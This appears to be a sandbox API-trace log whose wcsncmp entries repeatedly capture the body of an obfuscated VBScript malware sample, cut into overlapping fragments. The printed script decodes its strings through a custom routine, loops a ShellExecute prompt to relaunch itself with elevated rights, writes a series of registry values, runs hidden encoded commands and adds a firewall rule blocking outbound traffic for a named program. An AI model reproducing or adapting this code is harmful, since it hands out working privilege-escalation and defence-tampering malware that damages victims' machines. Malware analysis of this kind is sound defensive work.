Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0226.335] wcsncmp (_String1="EWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.335] wcsncmp (_String1="WFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0226.336] wcsncmp (_String1="FMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.336] wcsncmp (_String1="MDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0226.336] wcsncmp (_String1="DNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 